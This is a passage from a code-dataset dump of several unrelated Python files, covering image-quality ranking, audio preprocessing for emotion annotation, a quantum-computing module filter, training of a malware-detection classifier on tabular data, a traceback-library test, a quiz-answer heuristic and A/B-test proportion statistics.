votingArrSum[i]+=votingArrPMSE[i]\n \n votingSsimRank = rankdata(votingArrSSIM)\n votingPsnrRank = rankdata(votingArrPSNR)\n votingPmseRank = rankdata(votingArrPMSE)\n votingSumRank = rankdata(votingArrSum)\n \n #print (votingArrSSIM)\n for i in range(len(rImgs)):\n PltFunc.plot1row2Img(rImgs[i], tImg)\n print( \"ssim : %.2f , psnr : %.2f, pmse : %.2f\" %(ssimArr[i]*100.0, psnrArr[i],pmseArr[i]*100.0) )\n print( \"voting ssim : %.2f [%d]\" % (votingArrSSIM[i], votingSsimRank[i]))\n print( \"voting psnr : %.2f [%d]\" % (votingArrPSNR[i], votingPsnrRank[i]))\n print( \"voting pmse : %.2f [%d]\" % (votingArrPMSE[i], votingPmseRank[i]))\n print( \"voting sum : %.2f [%d]\" % (votingArrSum[i], votingSumRank[i]))\n \n print(\"==================================================================================\")\n print(\"Voting SSIM\")\n print(\"==================================================================================\")\n for j in range(0,10) :\n for i in range(len(votingSsimRank)) :\n if (votingSsimRank[i] == (26-j)) :\n PltFunc.plot1row2Img(rImgs[i], tImg)\n print( \"ssim : %.2f , psnr : %.2f, pmse : %.2f\" %(ssimArr[i]*100.0, psnrArr[i],pmseArr[i]*100.0) )\n print( \"voting ssim : %.2f [%d]\" % (votingArrSSIM[i], votingSsimRank[i]))\n print( \"voting psnr : %.2f [%d]\" % (votingArrPSNR[i], votingPsnrRank[i]))\n print( \"voting pmse : %.2f [%d]\" % (votingArrPMSE[i], votingPmseRank[i]))\n print( \"voting sum : %.2f [%d]\" % (votingArrSum[i], votingSumRank[i]))\n \n print(\"==================================================================================\")\n print(\"Voting PSNR\")\n print(\"==================================================================================\")\n for j in range(0,10) :\n for i in range(len(votingPsnrRank)) :\n if (votingPsnrRank[i] == (26-j)) :\n PltFunc.plot1row2Img(rImgs[i], tImg)\n print( \"ssim : %.2f , psnr : %.2f, pmse : %.2f\" %(ssimArr[i]*100.0, psnrArr[i],pmseArr[i]*100.0) )\n print( \"voting ssim : %.2f [%d]\" % (votingArrSSIM[i], votingSsimRank[i]))\n print( \"voting psnr : %.2f [%d]\" % (votingArrPSNR[i], votingPsnrRank[i]))\n print( \"voting pmse : %.2f [%d]\" % (votingArrPMSE[i], votingPmseRank[i]))\n print( \"voting sum : %.2f [%d]\" % (votingArrSum[i], votingSumRank[i]))\n \n print(\"==================================================================================\")\n print(\"Voting PMSE\")\n print(\"==================================================================================\")\n for j in range(0,10) :\n for i in range(len(votingPmseRank)) :\n if (votingPmseRank[i] == (26-j)) :\n PltFunc.plot1row2Img(rImgs[i], tImg)\n print( \"ssim : %.2f , psnr : %.2f, pmse : %.2f\" %(ssimArr[i]*100.0, psnrArr[i],pmseArr[i]*100.0) )\n print( \"voting ssim : %.2f [%d]\" % (votingArrSSIM[i], votingSsimRank[i]))\n print( \"voting psnr : %.2f [%d]\" % (votingArrPSNR[i], votingPsnrRank[i]))\n print( \"voting pmse : %.2f [%d]\" % (votingArrPMSE[i], votingPmseRank[i]))\n print( \"voting sum : %.2f [%d]\" % (votingArrSum[i], votingSumRank[i]))\n \n print(\"==================================================================================\")\n print(\"Voting SUM\")\n print(\"==================================================================================\")\n for j in range(0,10) :\n for i in range(len(votingSumRank)) :\n if (votingSumRank[i] == (26-j)) :\n PltFunc.plot1row2Img(rImgs[i], tImg)\n print( \"ssim : %.2f , psnr : %.2f, pmse : %.2f\" %(ssimArr[i]*100.0, psnrArr[i],pmseArr[i]*100.0) )\n print( \"voting ssim : %.2f [%d]\" % (votingArrSSIM[i], votingSsimRank[i]))\n print( \"voting psnr : %.2f [%d]\" % (votingArrPSNR[i], votingPsnrRank[i]))\n print( \"voting pmse : %.2f [%d]\" % (votingArrPMSE[i], votingPmseRank[i]))\n print( \"voting sum : %.2f [%d]\" % (votingArrSum[i], votingSumRank[i]))\n \n \nif __name__ == \"__main__\":\n renderImageBasePath = \"./renderimage/bonsai1/1/\"\n targetImageBasePath = \"./targetimage/bonsai1/1/\"\n targetImageFullPath = targetImageBasePath + 'bonsai1.jpg'\n \n ViewGuide.mainLoop(renderImageBasePath, targetImageFullPath)\n\n \n \n","sub_path":"SDDVR/viewpointGuiding/viewpointVoting_bonsai.py","file_name":"viewpointVoting_bonsai.py","file_ext":"py","file_size_in_byte":9733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"628009076","text":"import numpy as np\nimport os\nimport utilities_func as uf\nimport feat_analysis2 as fa\nimport pandas\nimport loadconfig\nimport ConfigParser\n#np.random.seed(24)\n\n#load configuration file\nconfig = loadconfig.load()\ncfg = ConfigParser.ConfigParser()\ncfg.read(config)\n\nSEQ_LENGTH = cfg.getint('preprocessing', 'sequence_length')\nSEQ_OVERLAP = cfg.getfloat('preprocessing', 'sequence_overlap')\n\nSOUND_FOLDER_PRETRAINING_T = cfg.get('preprocessing', 'input_audio_folder_PRETRAINING_t')\nANNOTATION_FOLDER_PRETRAINING_T = cfg.get('preprocessing', 'input_annotation_folder_PRETRAINING_t')\nOUTPUT_PREDICTORS_MATRIX_PRETRAINING_T = cfg.get('preprocessing', 'output_predictors_matrix_PRETRAINING_t')\nOUTPUT_TARGET_MATRIX_PRETRAINING_T = cfg.get('preprocessing', 'output_target_matrix_PRETRAINING_t')\n\nSOUND_FOLDER_PRETRAINING_V = cfg.get('preprocessing', 'input_audio_folder_PRETRAINING_v')\nANNOTATION_FOLDER_PRETRAINING_V = cfg.get('preprocessing', 'input_annotation_folder_PRETRAINING_v')\nOUTPUT_PREDICTORS_MATRIX_PRETRAINING_V = cfg.get('preprocessing', 'output_predictors_matrix_PRETRAINING_v')\nOUTPUT_TARGET_MATRIX_PRETRAINING_V = cfg.get('preprocessing', 'output_target_matrix_PRETRAINING_v')\n\nPREDICTORS_TOBEMERGED = cfg.get('preprocessing', 'output_predictors_matrix_t')\nTARGET_TOBEMERGED = cfg.get('preprocessing', 'output_target_matrix_t')\n\nOUTPUT_MERGED_PREDICTORS = cfg.get('preprocessing', 'output_predictors_matrix_merged')\nOUTPUT_MERGED_TARGET = cfg.get('preprocessing', 'output_target_matrix_merged')\n\nbounds_dict = np.load('../dataset/OMG2017/bounds_dict.npy')\nbounds_dict = bounds_dict.item()\n\nTARGET_DELAY = cfg.getint('preprocessing', 'target_delay')\nSR = cfg.getint('sampling', 'sr')\nHOP_SIZE = cfg.getint('stft', 'hop_size')\n\nfps = 25 #annotations per second\nhop_annotation = SR /fps\nframes_per_annotation = hop_annotation/float(HOP_SIZE)\n#frames_per_annotation = int(np.round(frames_per_annotation))\n'''\nreminder = frames_per_annotation % 1\n\nif reminder != 0.:\n raise ValueError('Hop size must be a divider of annotation hop (640)')\nelse:\n frames_per_annotation = int(frames_per_annotation)\n'''\nframes_delay = int(TARGET_DELAY * frames_per_annotation)\n\n\ndef merge_matrices(dataset1_path, dataset2_path, output_path):\n data1 = np.load(dataset1_path)\n data2 = np.load(dataset2_path)\n out_data = np.vstack((data1, data2))\n np.save(output_path, out_data)\n print(\"Successfully merged: \" + dataset1_path + ' AND ' + dataset2_path + ' INTO ' + output_path)\n print('Shape of merged matrix: ' + str(out_data.shape))\n\ndef preprocess_datapoint(input_sound, input_annotation):\n '''\n generate predictors (stft) and target (valence sequence)\n of one sound file from the OMG dataset\n '''\n name = input_sound.split('/')[-1].split('.')[0]\n start = bounds_dict[name]['start']\n end = bounds_dict[name]['end']\n startframe = int(np.round(start * fps))\n endframe = int(np.round(end*fps))\n startsamps = int(np.round(start*SR))\n endsamps = int(np.round(end*SR))\n\n sr, samples = uf.wavread(input_sound) #read audio\n samples = samples[startsamps:endsamps]\n e_samples = uf.preemphasis(samples, sr) #apply preemphasis\n feats = fa.extract_features(e_samples) #extract features\n annotation = np.load(input_annotation) #read annotations\n annotation = annotation[startframe:endframe]\n annotated_frames = int(len(annotation) * frames_per_annotation)\n feats = feats[:annotated_frames] #discard non annotated final frames\n annotation = annotation[TARGET_DELAY:] #shift back annotations by target_delay\n feats2 = feats[:-frames_delay]\n\n return feats, annotation\n\ndef segment_datapoint(features, annotation, sequence_length, sequence_overlap):\n '''\n segment features and annotations of one long audio file\n into smaller matrices of length \"sequence_length\"\n and overlapped by \"sequence_overlap\"\n '''\n step = sequence_length*sequence_overlap #segmentation overlap step\n num_datapoints = int(len(annotation) / step)\n pointer = np.arange(0,len(annotation), step, dtype='int') #initail positions of segments\n predictors = []\n target = []\n #slice arrays and append datapoints to vectors\n for start in pointer:\n start_annotation = start\n stop_annotation = start + sequence_length\n start_features = int(start_annotation * frames_per_annotation)\n stop_features = int(stop_annotation * frames_per_annotation)\n #print start_annotation, stop_annotation, start_features, stop_features\n if stop_annotation <= len(annotation):\n temp_predictors = features[start_features:stop_features]\n temp_target = annotation[start_annotation:stop_annotation]\n predictors.append(temp_predictors)\n target.append(temp_target)\n #target.append(np.mean(temp_target))\n else: #last datapoint has a different overlap\n temp_predictors = features[-int(sequence_length*frames_per_annotation):]\n temp_target = annotation[-sequence_length:]\n predictors.append(temp_predictors)\n target.append(temp_target)\n #target.append(np.mean(temp_target))\n predictors = np.array(predictors)\n target = np.array(target)\n\n return predictors, target\n\n\ndef preprocess_dataset(sound_folder, annotation_folder):\n '''\n build dataset numpy matrices:\n -predictors: contatining audio features\n -target: contatining correspective valence annotations\n both are NOT normalized\n datapoints order is randomly scrambled\n '''\n predictors = []\n target = []\n annotations = os.listdir(annotation_folder)\n #filtered_list = filter_items(annotations, target_subject, target_story)\n num_sounds = len(annotations)\n #process all files in folders\n index = 0\n for datapoint in annotations:\n print(datapoint)\n annotation_file = annotation_folder + '/' + datapoint\n name = datapoint.split('.')[0]\n sound_file = sound_folder + '/' + name +\".mp4.wav\" #get correspective sound\n long_predictors, long_target = preprocess_datapoint(sound_file, annotation_file) #compute features\n cut_predictors, cut_target = segment_datapoint(long_predictors, long_target, #slice feature maps\n SEQ_LENGTH, SEQ_OVERLAP)\n\n predictors.append(cut_predictors)\n target.append(cut_target)\n perc_progress = (index * 100) / num_sounds\n index += 1\n print(\"processed files: \" + str(index) + \" over \" + str(num_sounds) + \" | progress: \" + str(perc_progress) + \"%\")\n\n predictors = np.concatenate(predictors, axis=0) #reshape arrays\n target = np.concatenate(target, axis=0)\n #scramble datapoints order\n shuffled_predictors = []\n shuffled_target = []\n num_datapoints = target.shape[0]\n random_indices = range(num_datapoints)\n np.random.shuffle(random_indices)\n for i in random_indices:\n shuffled_predictors.append(predictors[i])\n shuffled_target.append(target[i])\n shuffled_predictors = np.array(shuffled_predictors)\n shuffled_target = np.array(shuffled_target)\n\n return shuffled_predictors, shuffled_target\n\ndef build_matrices(output_predictors_matrix, output_target_matrix, sound_folder, annotation_folder):\n '''\n build matrices and save numpy files\n '''\n predictors, target = preprocess_dataset(sound_folder, annotation_folder)\n np.save(output_predictors_matrix, predictors)\n np.save(output_target_matrix, target)\n print(\"Matrices saved succesfully\")\n print('predictors shape: ' + str(predictors.shape))\n print('target shape: ' + str(target.shape))\n\ndef crossval_preprocessing(target_subject_t, target_story_t, target_subject_v, target_story_v):\n ''' build matrices for one defined crossvalidation instalce'''\n #set output matrices as default temp crossvalidation ones\n OUTPUT_PREDICTORS_MATRIX_T = '../dataset/matrices/crossval_temp_predictors_t.npy'\n OUTPUT_TARGET_MATRIX_T = '../dataset/matrices/crossval_temp_target_t.npy'\n OUTPUT_PREDICTORS_MATRIX_V = '../dataset/matrices/crossval_temp_predictors_v.npy'\n OUTPUT_TARGET_MATRIX_V = '../dataset/matrices/crossval_temp_target_v.npy'\n #substitute config target subject and stories with the ones of the experiment\n TARGET_SUBJECT_T = target_subject_t\n TARGET_STORY_T = target_story_t\n TARGET_SUBJECT_V = target_subject_v\n TARGET_STORY_V = target_story_v\n\n #build training matrix\n build_matrices(OUTPUT_PREDICTORS_MATRIX_T, OUTPUT_TARGET_MATRIX_T,\n SOUND_FOLDER_T, ANNOTATION_FOLDER_T, TARGET_SUBJECT_T, TARGET_STORY_T)\n\n\nif __name__ == '__main__':\n '''\n build training and validation matrices\n '''\n build_matrices(OUTPUT_PREDICTORS_MATRIX_PRETRAINING_T, OUTPUT_TARGET_MATRIX_PRETRAINING_T, SOUND_FOLDER_PRETRAINING_T, ANNOTATION_FOLDER_PRETRAINING_T)\n build_matrices(OUTPUT_PREDICTORS_MATRIX_PRETRAINING_V, OUTPUT_TARGET_MATRIX_PRETRAINING_V, SOUND_FOLDER_PRETRAINING_V, ANNOTATION_FOLDER_PRETRAINING_V)\n\n #merge_matrices(OUTPUT_PREDICTORS_MATRIX_2017, PREDICTORS_TOBEMERGED, OUTPUT_MERGED_PREDICTORS)\n #merge_matrices(OUTPUT_TARGET_MATRIX_2017, TARGET_TOBEMERGED, OUTPUT_MERGED_TARGET)\n","sub_path":"src/OMG_challenge/preprocessing_PRETRAININGdataset.py","file_name":"preprocessing_PRETRAININGdataset.py","file_ext":"py","file_size_in_byte":9233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"178798368","text":"from typing import List, Optional\n\nfrom QCompute import UnrollCircuitModule, CompressGateModule\n\nfrom QCompute.OpenModule import ModuleImplement\nfrom QCompute.QPlatform import BackendName, Error\n\n\ndef filterModule(backendName: Optional[str], moduleList: List['ModuleImplement']) \\\n -> List['ModuleImplement']:\n if backendName is None:\n return moduleList\n\n if backendName in [\n BackendName.LocalBaiduSim2.value,\n \n ]:\n return _filterSimulator(backendName, moduleList)\n \n else:\n return moduleList\n\n\ndef _filterSimulator(backendName: str, moduleList: List['ModuleImplement']) -> List['ModuleImplement']:\n unrollCircuitModule = None # type: Optional[UnrollCircuitModule]\n compressGateModule = None # type: Optional[CompressGateModule]\n ret = [] # type: List['ModuleImplement']\n for module in moduleList:\n \n if module.__class__.__name__ == 'UnrollCircuitModule':\n unrollCircuitModule = module\n elif module.__class__.__name__ == 'CompressGateModule':\n compressGateModule = module\n elif not module.disable:\n ret.append(module)\n if unrollCircuitModule is not None:\n if not unrollCircuitModule.disable:\n ret.append(unrollCircuitModule)\n else:\n ret.append(UnrollCircuitModule())\n if backendName not in [\n \n ]:\n if compressGateModule is not None:\n if not compressGateModule.disable:\n ret.append(compressGateModule)\n else:\n ret.append(CompressGateModule())\n return ret\n\n\n\n","sub_path":"QCompute/QPlatform/Processor/ModuleFilter.py","file_name":"ModuleFilter.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"524392632","text":"import os\nimport numpy as np\nfrom numpy import *\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom matplotlib import pyplot\nimport sys, math, joblib, gc\nfrom sklearn import preprocessing\nimport pickle\nfrom sklearn import metrics\nimport transform_helper as Transform \nfrom Model import Model\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, BatchNormalization, Activation\nfrom keras.optimizers import Adam\nimport tensorflow as tf\n\n\ndef repeat_softmax(X, y, preBuilt=False, model=None):\n\tX_train = X \n\ty_train = y\n\t\n\tif not preBuilt:\n\t\tX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=1)\n\t\t\n\t\tmodel = LogisticRegression(C=0.040980805223454236, tol=0.0037189066625450827, penalty='l2', max_iter=100,\n\t\t\t\t\t\t\t solver='newton-cg', warm_start=True)\n\t\n\t\n\ttrees = ExtraTreesClassifier(random_state=1)\n\ttrees.fit(X_train, y_train)\n\tselector = SelectFromModel(trees, prefit=True, threshold=-np.inf)\n\t\t\n\t#NEW X_TRAIN FROM SELECTED FEATURES:\n\tX_train = selector.transform(X_train)\n\n\t#standardize data\n\tX_train = preprocessing.StandardScaler().fit_transform(X_train)\n\t\n\tmodel.fit(X_train, y_train)\n\n\treturn model\n\ndef repeat_neural_network(X, y, preBuilt=False, model=None):\n\tX_train = X \n\ty_train = y\n\t\n\tif not preBuilt:\n\t\tX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=1)\n\t\t\n\t\tcols = X.shape[1]\n\t\tmodel = Sequential()\n\t\tmodel.add(Dense(100,input_dim=cols))\n\t\tmodel.add(Dropout(0.4))\n\t\tmodel.add(BatchNormalization())\n\t\tmodel.add(Activation('relu'))\n\t\tmodel.add(Dense(100))\n\t\tmodel.add(Dropout(0.4))\n\t\tmodel.add(BatchNormalization())\n\t\tmodel.add(Activation('relu'))\n\t\tmodel.add(Dense(1, activation='sigmoid'))\n\t\tmodel.compile(optimizer=Adam(lr=0.01), loss=\"binary_crossentropy\", metrics=[tf.keras.metrics.AUC()])\n\t\t\n\ttrees = ExtraTreesClassifier(random_state=1)\n\ttrees.fit(X_train, y_train)\n\tselector = SelectFromModel(trees, prefit=True, threshold=-np.inf)\n\t\n\t#NEW X_TRAIN FROM SELECTED FEATURES:\n\tX_train = selector.transform(X_train)\n\t\n\t#standardize data\n\tX_train = preprocessing.StandardScaler().fit_transform(X_train)\n\t\n\tmodel.fit(X_train, y_train)\n\t\n\treturn model\n\n\ndef evaluate_model(X, y, model, nn):\n\tX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=1)\n\t\n\ttrees = ExtraTreesClassifier(random_state=1)\n\ttrees.fit(X_train, y_train)\n\t\n\tselector = SelectFromModel(trees, prefit=True, threshold=-np.inf)\n\t\n\tX_test = selector.transform(X_test)\n\tX_test = preprocessing.StandardScaler().fit_transform(X_test) \n\t\n\tyhat = model.predict_proba(X_test)\n\tyhat = yhat[:, 1] if nn is False else yhat\n\t\n\tscore = metrics.roc_auc_score(y_test, yhat, average=None)\n\t\n\tprint(f\"\\nAUC Score: {score}\\n\")\n\t\n\nif __name__ == \"__main__\":\n\t\n\tMODEL_NUM = 1 # 1 - softmax, 2 - neural network\n\tTRAIN_CHUNKS = 0 # 0 - False, 1 - True\n\t\n\tmodel_dict = {\n\t\t1: 'softmax',\n\t\t2: 'neural_network',\n\t\t3: 'random_forest'\n\t}\n\t\n\tif len(sys.argv) > 2:\n\t\tMODEL_NUM = int(sys.argv[1])\n\t\tTRAIN_CHUNKS = int(sys.argv[2])\n\t\t\n\telif len(sys.argv) > 1:\n\t\tMODEL_NUM = int(sys.argv[1])\n\t\t\n\tdata_path = f'data{os.sep}'\n\ttrain_path = \"\"\n\t\n\ttrain_path = data_path + 'train.csv'\n\t\n\tdtypes = Transform.get_dtypes()\n\t\n\tprint('Reading from csv...')\n\t\n\ttrain_data = pd.read_csv(train_path, nrows=100000, dtype=dtypes)\n\t\n\tprint('Done\\n')\n\n\tytr = train_data[\"HasDetections\"].to_numpy()\n\t\n\tprint('Transforming Dataframe...')\n\t\n\ttrain_data = Transform.transform_dataframe(train_data)\n\t\n\ttrain_data = Transform.transform_categorical(train_data) # perform one-hot encoding on categorical columns\n\n\t# ONLY NEED FOR FULL NEURAL NETWORK \n\t# if os.path.isfile(\"test_submission2.csv\"):\n\t# \ttest_path = \"test_submission2.csv\"\n\t# \ttest_data = pd.read_csv(test_path, nrows=1)\n\t# \ttrain_data = Transform.make_matching_invert(train_data, test_data)\n\t\n\tlabels = list(train_data.columns)\n\t\n\ttmp_df = pd.DataFrame(columns=labels)\n\ttmp_df.to_csv('final_train.csv', index=False)\n\n\ttrain_data = train_data.drop(['MachineIdentifier', 'HasDetections'], axis=1) # drop unnecessary columns\n\t\n\tprint('Done\\n')\n\t\n\tprint('Training model...')\n\t\n\tselection = None\n\tmodel = None\n\t\n\tif TRAIN_CHUNKS == 1:\n\t\tXtr = train_data.to_numpy(dtype='float64')\n\t\tXtr = np.nan_to_num(Xtr)\n\t\t\n\t\t#Xtr_evaluator = np.copy(Xtr)\n\t\t\n\t\ttrain_chunks = Transform.split_dataframe(train_data, chunk_size=100000) # 100000\n\t\tytr_chunks = Transform.split_dataframe(ytr, chunk_size=100000)\n\t\t\n\t\tdel train_data \n\t\tgc.collect()\n\t\t\n\t\tlist_of_chunks = []\n\t\t\n\t\tfor i,chunk in enumerate(train_chunks):\n\t\t\tprint(f'Chunk #{i}')\n\t\t\tXtr = chunk.to_numpy(dtype='float64')\n\t\t\tXtr = np.nan_to_num(Xtr)\n \n\t\t\tif MODEL_NUM == 2:\n\t\t\t\tif i != 0:\n\t\t\t\t\tmodel = tf.keras.models.load_model('chunk_model_tf')\n\t \n\t\t\t\tmodel = repeat_neural_network(Xtr, ytr_chunks[i], i>0, model)\n\t\n\t\t\t\tmodel.save('chunk_model_tf', save_format='tf')\n\n\t\t\telse:\n\t\t\t\tmodel = repeat_softmax(Xtr, ytr_chunks[i], i > 0, model)\n \n\t\tdel Xtr, train_chunks, ytr_chunks\n\t\tgc.collect()\n \n\t\tprint('\\nEvaluating Model...')\n\t\t\n\t\t#evaluate_model(Xtr_evaluator, ytr, model, MODEL_NUM==2)\n\t\t \n\t\t\t\n\telse:\n\t\tXtr = train_data.to_numpy(dtype='float64')\n\t\tXtr = np.nan_to_num(Xtr)\n\t\n\t\tmodel = Model(Xtr, ytr, labels, MODEL_NUM)\n\t\t\n\t\tmodel = model.train_model()\n\t\n\t\n\tprint('Done\\n')\n\t\n\t# save the model to disk\n\tmodel_name = model_dict.get(MODEL_NUM)\n\t\n\tprint('Saving....\\n')\n\t\n\tif MODEL_NUM == 2:\n\t\tmodel_json = model.to_json()\n\t\n\t\twith open(f'saved_models{os.sep}model.json', 'w') as json_file:\n\t\t\tjson_file.write(model_json)\n\n\t\t# serialize the weights\n\t\tmodel.save_weights(f'saved_models{os.sep}model.h5')\n\t\t\n\telse:\n\t\tfilename = f'saved_models{os.sep}model.sav'\n\t\tjoblib.dump(model, filename)\n\t\n\tf = open('model_num.pckl', 'wb')\n\tpickle.dump(MODEL_NUM, f)\n\tf.close()\n\t\n\tprint(f'{model_name} model saved')\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"3519646","text":"\"\"\"In this file, we test to ensure that the output of\ncheck_syntax is as expected.\n\nWe also test to ensure that check_syntax does not accidently\nchange any existing error handling settings.\n\n\"\"\"\n\nimport friendly_traceback as friendly\n\n\ndef test_check_syntax():\n # set-up\n bad_code_syntax = \"True = 1\"\n bad_code_exec = \"a = b\" # Not a syntax error, but a NameError\n good_code = \"c = 1\"\n\n friendly.set_stream(\"capture\")\n original_verbosity = friendly.get_verbosity()\n installed = friendly.is_installed()\n # ----- end of set-up\n\n # When a SyntaxError is raised, check_syntax returns False\n\n assert not friendly.advanced_check_syntax(source=bad_code_syntax)\n result = friendly.get_output() # content is flushed\n assert \"Python exception\" in result\n assert \"SyntaxError\" in result\n\n assert not friendly.get_output() # confirm that content was flushed\n\n # When no SyntaxError is raised, check_syntax returns a tuple\n # containing a code object and a file name\n assert friendly.advanced_check_syntax(source=bad_code_exec)\n assert friendly.advanced_check_syntax(source=good_code)\n assert not friendly.get_output() # no new exceptions recorded\n\n try:\n exec(bad_code_syntax, {})\n except Exception:\n assert not friendly.get_output()\n\n # When friendly-traceback is not installed, a call to check_syntax\n # will end with verbosity set to 0, which corresponds to normal Python\n # tracebacks\n friendly.uninstall()\n friendly.advanced_check_syntax(source=bad_code_syntax)\n assert friendly.get_verbosity() == 0\n friendly.advanced_check_syntax(source=bad_code_syntax, verbosity=4)\n assert friendly.get_verbosity() == 0\n\n # When friendly-traceback is \"installed\", a call to check_syntax\n # leaves its verbosity unchanged.\n friendly.install(redirect=\"capture\")\n\n friendly.set_verbosity(3)\n friendly.advanced_check_syntax(source=bad_code_syntax)\n assert friendly.get_verbosity() == 3\n friendly.advanced_check_syntax(source=bad_code_syntax, verbosity=4)\n assert friendly.get_verbosity() == 3\n\n # A call to advanced_code_syntax, with a language specified as an argument\n # should leave the previous language unchanged.\n\n friendly.set_lang(\"en\")\n assert not friendly.advanced_check_syntax(source=bad_code_syntax, lang=\"fr\")\n result = friendly.get_output()\n assert \"Exception Python\" in result # French heading\n assert friendly.get_lang() == \"en\"\n\n # Clean up and restore for other tests\n friendly.get_output()\n friendly.set_stream(None)\n if installed:\n friendly.uninstall()\n friendly.set_verbosity(original_verbosity)\n\n\nif __name__ == \"__main__\":\n test_check_syntax()\n print(\"Success!\")\n","sub_path":"tests/unit/test_check_syntax.py","file_name":"test_check_syntax.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"493786579","text":"import jieba\nimport re\nimport os\nimport tool.expand_tool as expand_tool\n\n# 创建停用词列表\ndef stopwordslist():\n stopwords = [line.strip() for line in open(\"tool\" + os.sep + 'baidu_stopwords.txt', encoding='UTF-8').readlines()]\n return stopwords\n\n\ndef cut_text(input_str):\n cut_list = jieba.cut(input_str, cut_all=False)\n #res_list = [c1 for c1 in cut_list if c1 not in stop_words]\n return cut_list\n\n\ndef do_judge_type(question, hint):\n hint = ' '.join(hint)\n hint = expand_tool.remove_symbol(hint)\n question = expand_tool.remove_symbol(question)\n if len(hint) > len(question):\n if question in hint:\n return ['A']\n else:\n if hint in question:\n return ['A']\n return ['B']\n\ndef do_muti_selection(selections,question_content,hint):\n hint = ' '.join(hint)\n sel_list = []\n letters = ['A','B','C','D','E','F']\n count = find_continue_blank_count(question_content)\n if len(selections) == count:\n for i in range(count):\n sel_list.append(letters[i])\n return sel_list\n for i in range(len(selections)):\n if expand_tool.remove_symbol(selections[i]) in hint:\n sel_list.append(letters[i])\n if len(sel_list) < count:#判断出的选项不够,随机补一个\n n1 = count - len(sel_list)\n t1 = 0\n for let in letters:\n if let not in sel_list and t1 < n1:\n sel_list.append(let)\n t1 += 1\n\n return sel_list\n\ndef do_single_selection(selections, question_content, hint_text):\n hint_text = ''.join(hint_text)\n hint_text = expand_tool.remove_symbol(hint_text)\n ratio = [0]*len(selections)\n res_list = []\n letters = ['A', 'B', 'C', 'D', 'E', 'F']\n\n #判断题\n if expand_tool.remove_symbol(selections[0]) == \"正确\" and expand_tool.remove_symbol(selections[1]) == \"错误\":\n res_list = do_judge_type(question_content,hint_text)\n return res_list\n\n #反选题\n in_count = 0\n out_index = 0\n for i in range(len(selections)):\n if selections[i] in hint_text:\n ratio[i] = 1\n in_count += 1\n else:\n out_index = i\n if in_count == len(selections)-1:#单选题有三个选项在提示里面,说明是反选,选择不在提示中的那个\n res_list = [letters[i]]\n return res_list\n\n\n\n for m in range(len(selections)):\n if len(selections[m]) > len(hint_text):\n short_str = hint_text\n long_str = selections[m]\n else:\n short_str = selections[m]\n long_str = hint_text\n short_str = expand_tool.remove_symbol(short_str)\n long_str = expand_tool.remove_symbol(long_str)\n match_length = 0\n for i in range(len(short_str)):\n if short_str[i] in long_str:\n match_length += 1\n ratio[m] = match_length\n max_value = 0\n max_index = 0\n for i in range(len(ratio)):\n if ratio[i] > max_value:\n max_value = ratio[i]\n max_index = i\n res_list.append(letters[max_index])\n return res_list\n\n\ndef find_continue_blank_count(msg):\n pattern = r'()'\n res = re.findall(pattern,msg)\n return len(res)\n\ndef test():\n str = \"今天烟台很多地方下了雪,包括 、 、和 。haiyou \"\n find_continue_blank_count(str)\n\n#stop_words = stopwordslist()\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"SourcePackages/tool/SemanticAnalyze.py","file_name":"SemanticAnalyze.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"405920914","text":"import numpy as np\nimport scipy as sp\n\n#frequentist\ndef proportion_test(c1, c2, n1, n2, mode = 'two_sided'):\n p = (c1+c2) / (n1+n2)\n p1 = c1 / n1\n p2 = c2 / n2\n z = (p1-p2) / np.sqrt(p*(1-p)*(1/n1 + 1/n2))\n if mode=='two_sided':\n p = 2*(1-sp.stats.norm.cdf(abs(z)))\n elif mode=='one_sided':\n p = 1-sp.stats.norm.cdf(abs(z))\n else:\n raise ValueError('Available modes are `one_sided` and `two_sided`')\n return z, p\n\ndef proportion_ci(c,n, p_value=0.05):\n p = c/n\n se = np.sqrt(p*(1-p)/n)\n z = sp.stats.norm.ppf(1-p_value/2)\n return p-z*se, p, p+z*se\n\n#bayesian\ndef sample_proportion(c,n,a=1,b=1,sim_size=100000): \n return np.random.beta(c+a,n-c+b,sim_size)\n\ndef proportion_test_b(c1,c2,n1,n2,a1=1,a2=1,b1=1,b2=1,sim_size=100000):\n p1 = sample_proportion(c1,n1,a1,b1,sim_size)\n p2 = sample_proportion(c2,n2,a2,b2,sim_size)\n return (p1 > p2).mean()\n\ndef proportion_ratio(c1,c2,n1,n2,a1=1,a2=1,b1=1,b2=1,sim_size=100000):\n p1 = sample_proportion(c1,n1,a1,b1,sim_size)\n p2 = sample_proportion(c2,n2,a2,b2,sim_size)\n return p1/p2\n\ndef proportion_ci_b(c1,c2,n1,n2,p_value=0.05,a1=1,a2=1,b1=1,b2=1,sim_size=100000):\n ratios = proportion_ratio(c1,c2,n1,n2,a1,a2,b1,b2,sim_size)\n return np.quantile(ratios,[p_value/2,1-p_value/2])\n\ndef value_remaining(c1,c2,n1,n2,q=95,sim_size=100000,a1=1,a2=1,b1=9,b2=9):\n p1 = sample_proportion(c1,n1,a1,b1,sim_size)[:,None]\n p2 = sample_proportion(c2,n2,a2,b2,sim_size)[:,None]\n p = np.concatenate([p1,p2],1)\n p_max = p.max(1)\n best_idx = np.argmax([p1.mean(),p2.mean()])\n p_best = p[:,best_idx]\n vs = (p_max-p_best)/p_best\n return 